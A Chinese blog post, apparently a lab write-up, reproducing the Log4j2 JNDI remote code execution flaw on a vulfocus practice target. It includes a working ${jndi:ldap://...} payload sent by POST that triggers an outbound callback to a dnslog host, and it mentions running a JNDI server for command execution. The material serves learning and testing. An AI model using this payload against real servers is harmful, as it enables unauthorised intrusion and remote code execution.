用vulfocus靶场环境复现Log4j2远程命令执行漏洞

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

用vulfocus启动一个靶场环境,Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
在这里插入图片描述

提示当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx
访问:http://vulfocus.fofa.so:35273/
在这里插入图片描述

扫描后台发现/error、/index.php、/hello
分别访问:
http://vulfocus.fofa.so:35273/error
在这里插入图片描述

http://vulfocus.fofa.so:35273/index.php
在这里插入图片描述

http://vulfocus.fofa.so:35273/hello
在这里插入图片描述

提示:不支持请求方法“GET”

我们可以用burpsuite或者火狐浏览器拦截编辑发送的数据包,这里我们只是简单利用就直接用火狐浏览器演示一下:
在这里插入图片描述

将数据提交方式改为POST,在请求主体中随便写点内容
在这里插入图片描述

发送:
在这里插入图片描述
在这里插入图片描述

返回OK提示我们能够成功发送数据包
再编辑重发,注意要加一个Content-Type: application/x-www-form-urlencoded:
构造payload="${jndi:ldap://987r84.dnslog.cn/exp}"
在这里插入图片描述

之后查看http://www.dnslog.cn/的987r84.dnslog.cn:
在这里插入图片描述

有对应的攻击记录,证明存在漏洞。
也可以在本地搭建运行JNDI服务,实现远程任意命令执行。

文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值